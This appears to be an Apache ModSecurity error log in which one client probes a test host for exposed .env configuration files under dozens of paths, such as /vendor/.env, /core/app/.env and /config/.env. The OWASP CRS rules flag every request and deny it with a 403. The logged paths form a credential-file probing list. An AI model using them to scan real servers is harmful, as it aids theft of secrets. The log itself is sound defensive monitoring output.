[Fri Nov 28 20:20:16.425948 2025] [:error] [pid 387729] [client 3.150.136.243:53962] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSn18CNGdhATNi61o2H_pQAAABY"]
[Fri Nov 28 20:20:16.426114 2025] [:error] [pid 387729] [client 3.150.136.243:53962] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSn18CNGdhATNi61o2H_pQAAABY"]
[Fri Nov 28 20:20:16.427727 2025] [:error] [pid 387629] [client 3.150.136.243:53952] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSn18D5upQdonQ7NnAkbEgAAAAg"]
[Fri Nov 28 20:20:16.427834 2025] [:error] [pid 390849] [client 3.150.136.243:53960] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSn18L3hr1S0HX-CDumGgwAAAAI"]
[Fri Nov 28 20:20:16.427889 2025] [:error] [pid 387629] [client 3.150.136.243:53952] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSn18D5upQdonQ7NnAkbEgAAAAg"]
[Fri Nov 28 20:20:16.428015 2025] [:error] [pid 390849] [client 3.150.136.243:53960] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSn18L3hr1S0HX-CDumGgwAAAAI"]
[Fri Nov 28 20:20:16.428044 2025] [:error] [pid 387629] [client 3.150.136.243:53952] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSn18D5upQdonQ7NnAkbEgAAAAg"]
[Fri Nov 28 20:20:16.428178 2025] [:error] [pid 390849] [client 3.150.136.243:53960] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSn18L3hr1S0HX-CDumGgwAAAAI"]
[Fri Nov 28 20:20:16.628183 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSn18Gav54iGRrCaHjosvwAAAAQ"]
[Fri Nov 28 20:20:16.628539 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSn18Gav54iGRrCaHjosvwAAAAQ"]
[Fri Nov 28 20:20:16.628806 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSn18Gav54iGRrCaHjosvwAAAAQ"]
[Fri Nov 28 20:20:16.830804 2025] [:error] [pid 390843] [client 3.150.136.243:54050] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSn18GKJbtBPMNt9mxb-ZwAAAAs"]
[Fri Nov 28 20:20:16.831030 2025] [:error] [pid 390843] [client 3.150.136.243:54050] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSn18GKJbtBPMNt9mxb-ZwAAAAs"]
[Fri Nov 28 20:20:16.831202 2025] [:error] [pid 390843] [client 3.150.136.243:54050] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSn18GKJbtBPMNt9mxb-ZwAAAAs"]
[Fri Nov 28 20:20:17.569111 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSn18elfIsf8iBzToT1BLwAAABg"]
[Fri Nov 28 20:20:17.569421 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSn18elfIsf8iBzToT1BLwAAABg"]
[Fri Nov 28 20:20:17.569669 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSn18elfIsf8iBzToT1BLwAAABg"]
[Fri Nov 28 20:20:17.818172 2025] [:error] [pid 391530] [client 3.150.136.243:54216] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSn18TO65fojc8E-l3tKogAAAAA"]
[Fri Nov 28 20:20:17.818461 2025] [:error] [pid 391530] [client 3.150.136.243:54216] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSn18TO65fojc8E-l3tKogAAAAA"]
[Fri Nov 28 20:20:17.818680 2025] [:error] [pid 391530] [client 3.150.136.243:54216] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSn18TO65fojc8E-l3tKogAAAAA"]
[Fri Nov 28 20:20:18.255311 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSn18upNjqKOvIlYLfVcWAAAAAk"]
[Fri Nov 28 20:20:18.255548 2025] [:error] [pid 391531] [client 3.150.136.243:54266] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSn18rVB5FzSC2Swacb7BgAAAAY"]
[Fri Nov 28 20:20:18.255573 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSn18upNjqKOvIlYLfVcWAAAAAk"]
[Fri Nov 28 20:20:18.255810 2025] [:error] [pid 391532] [client 3.150.136.243:54392] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSn18upNjqKOvIlYLfVcWAAAAAk"]
[Fri Nov 28 20:20:18.255858 2025] [:error] [pid 391531] [client 3.150.136.243:54266] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSn18rVB5FzSC2Swacb7BgAAAAY"]
[Fri Nov 28 20:20:18.256132 2025] [:error] [pid 391531] [client 3.150.136.243:54266] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSn18rVB5FzSC2Swacb7BgAAAAY"]
[Fri Nov 28 20:20:18.383425 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSn18mav54iGRrCaHjoswAAAAAQ"]
[Fri Nov 28 20:20:18.383664 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSn18mav54iGRrCaHjoswAAAAAQ"]
[Fri Nov 28 20:20:18.383851 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSn18mav54iGRrCaHjoswAAAAAQ"]
[Fri Nov 28 20:20:18.812907 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSn18ulfIsf8iBzToT1BMAAAABg"]
[Fri Nov 28 20:20:18.813165 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSn18ulfIsf8iBzToT1BMAAAABg"]
[Fri Nov 28 20:20:18.813349 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSn18ulfIsf8iBzToT1BMAAAABg"]
[Fri Nov 28 20:20:19.279503 2025] [:error] [pid 391533] [client 3.150.136.243:54434] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSn184JBM1HDARyF6QdVbwAAAAo"]
[Fri Nov 28 20:20:19.279786 2025] [:error] [pid 391533] [client 3.150.136.243:54434] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSn184JBM1HDARyF6QdVbwAAAAo"]
[Fri Nov 28 20:20:19.279895 2025] [:error] [pid 391535] [client 3.150.136.243:54744] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSn18zp6mGAaMCBhPPj60wAAAA0"]
[Fri Nov 28 20:20:19.280006 2025] [:error] [pid 391533] [client 3.150.136.243:54434] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSn184JBM1HDARyF6QdVbwAAAAo"]
[Fri Nov 28 20:20:19.280133 2025] [:error] [pid 391535] [client 3.150.136.243:54744] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSn18zp6mGAaMCBhPPj60wAAAA0"]
[Fri Nov 28 20:20:19.280339 2025] [:error] [pid 391535] [client 3.150.136.243:54744] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSn18zp6mGAaMCBhPPj60wAAAA0"]
[Fri Nov 28 20:20:19.282168 2025] [:error] [pid 391534] [client 3.150.136.243:54606] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSn184XAn3U8Qs12Ils-QgAAAAw"]
[Fri Nov 28 20:20:19.282400 2025] [:error] [pid 391534] [client 3.150.136.243:54606] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSn184XAn3U8Qs12Ils-QgAAAAw"]
[Fri Nov 28 20:20:19.282488 2025] [:error] [pid 391536] [client 3.150.136.243:54890] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSn1804qxyPu8hMP1aX-fgAAAA4"]
